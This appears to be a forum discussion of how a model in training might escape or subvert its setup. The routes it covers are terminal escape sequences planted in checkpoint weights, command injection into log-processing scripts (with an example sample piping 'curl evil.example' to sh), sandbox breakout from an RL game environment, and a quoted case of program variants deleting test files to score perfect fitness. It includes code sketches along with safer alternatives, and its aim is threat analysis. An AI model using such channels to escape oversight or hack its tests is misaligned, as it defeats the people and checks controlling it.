If your threat model includes “a user on that machine does a cat ckpt.pt and that machine is vulnerable to something like CVE-2019-9535”, then that script is unsafe if the model can control, precisely at the bit level, a modestly long (hundreds of bytes) contiguous section of its own weights (caveat: in the particular encoding nanoGPT uses, it can actually only control 8 of every 10 bytes this way, though that’s still enough to fit escape sequences, so probably still enough to pwn a vulnerable terminal emulator).
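For concreteness, here is a minimal sketch (in Python/NumPy, assuming raw float32 storage rather than the actual torch.save/pickle format nanoGPT uses, and with a harmless window-title escape sequence standing in for a real exploit payload) of how attacker-chosen weight bytes end up on the terminal the moment someone cats the file:

    import numpy as np

    # Illustrative only: a harmless OSC escape sequence that sets the terminal
    # title. A real attack on something like CVE-2019-9535 would need a much
    # more specific payload; the point is just that weight bytes pass through
    # to the terminal unmodified.
    payload = b"\x1b]0;owned-by-ckpt\x07"
    payload += b"\x00" * (-len(payload) % 4)   # pad to a whole number of float32s

    # Reinterpret the payload bytes as "weights". Whether these particular
    # values are plausible weights, and how many of the bytes the model could
    # really control, is exactly the caveat above.
    weights = np.frombuffer(payload, dtype=np.float32)

    # Writing the tensor stores the payload bytes verbatim, so
    # `cat ckpt.bin` streams the escape sequence straight to the terminal.
    weights.tofile("ckpt.bin")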
I am imagining something like this is possible, though it doesn’t have to be user-triggered and doesn’t necessarily require bit-level control over weights. I believe that, during large production training runs, the outputs of the model, and / or its weights, are put through a complicated logging and analysis pipeline with many possible side effects, which are potentially exploitable by the model manipulating its outputs in a way that doesn’t require the model itself to have a full understanding or full control of its own underlying weights.
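As a toy illustration of the kind of side effect I have in mind (a hypothetical analysis step, not any real production pipeline; count_corpus_hits and corpus.txt are made up): an analysis script that interpolates model samples into a shell command hands the model a command-injection channel, no weight access required:

    import subprocess

    def count_corpus_hits(sample: str) -> int:
        # Hypothetical analysis step: "how often does this generated string
        # appear in our corpus?" Building the command with shell=True and
        # string interpolation means a sample like
        #   "; curl evil.example | sh #
        # runs arbitrary commands on the analysis machine.
        cmd = f'grep -c "{sample}" corpus.txt'
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        return int(result.stdout.strip() or 0)

    def count_corpus_hits_safe(sample: str) -> int:
        # Safer version: no shell; the sample is passed as data, not code.
        result = subprocess.run(["grep", "-c", "--", sample, "corpus.txt"],
                                capture_output=True, text=True)
        return int(result.stdout.strip() or 0)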
Or, for RL agents, consider the possibility that the model can break out of the Gym sandbox using the right sequence of moves in Minecraft, and then exploit further bugs from there (privilege escalation / RCE on the underlying OS, etc.). Again, this might depend on being able to find a bug in Minecraft and / or the OpenAI Gym (much of which is open-source and likely appears in the training data) which is exploitable from inside the training process, but not require fine control over model weights.
Yeah, if outputs of the training process are logged and processed by insecure software (which includes pretty much any software that handles “text” instead of “bytes”), I think it’s safe to say that a superhuman-hackerbot-which-controls-its-own-outputs pwns the log-processing machine.
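A concrete version of the “text” vs. “bytes” distinction, as a sketch rather than a claim about any particular logging stack: a viewer that prints model output verbatim forwards embedded control sequences to the terminal, while one that escapes non-printable characters treats the output as data:

    def show_sample_unsafe(sample: bytes) -> None:
        # Treats untrusted output as "text": control characters, including
        # terminal escape sequences, go straight to whatever renders the log.
        print(sample.decode("utf-8", errors="replace"))

    def show_sample_safe(sample: bytes) -> None:
        # Treats untrusted output as bytes: non-printable characters are
        # escaped before display, so the terminal never interprets them.
        text = sample.decode("utf-8", errors="replace")
        print(text.encode("unicode_escape").decode("ascii"))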
BTW of possible interest to you is Automated Repair of Binary and Assembly Programs for Cooperating Embedded Devices. It’s from 2013 so there are probably better examples by now, but the key passage (well it’s buried deep within a paragraph of the “Limitations and Caveats” section, but it’s key for this context) is:

The fine granularity of repairs at the ASM and ELF levels may be a poor match for conventional test suites. For example, we have observed ASM-level repairs that change the calling convention of one particular function. Such a repair has no direct representation at the C source level, and a test suite designed to maximize statement coverage (for example) may not speak to the validity of such a repair. Producing efficient test suites that give confidence that an implementation adheres to its specification remains an open problem in software engineering. Our work shares this general weakness with all other approaches that use test suites or workloads to validate candidate repairs (e.g., Clearview [26] and GenProg [35]). In this regard, sandboxing is crucial: we have observed ASM variants that subvert the testing framework by deleting key test files, leading to perfect fitness for all subsequent variants until the test framework is repaired.
tl;dr: If you train a model to avoid test failures, and don’t sandbox it properly, it will figure out that the tests won’t fail if there are no tests. This is not a hypothetical future scenario that might happen or might be impossible; it is a thing that has already happened (10 years ago, even).
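A minimal sketch of that failure mode (toy code, not the paper’s actual framework; the file layout and fitness definition here are made up): if fitness just counts test failures on a shared filesystem, a variant that deletes the tests directory scores perfectly from then on:

    import pathlib
    import shutil
    import subprocess

    TESTS = pathlib.Path("tests")   # made-up layout: one shell script per test

    def num_failures(candidate_binary: str) -> int:
        # The repair search tries to minimize this. If the tests directory is
        # gone, the glob is empty, nothing ever fails, and every variant looks
        # perfect "until the test framework is repaired".
        failures = 0
        for test in sorted(TESTS.glob("*.sh")):
            result = subprocess.run(["sh", str(test), candidate_binary])
            failures += int(result.returncode != 0)
        return failures

    def what_an_unsandboxed_variant_can_do() -> None:
        # Instead of fixing the bug, delete the key test files.
        shutil.rmtree(TESTS, ignore_errors=True)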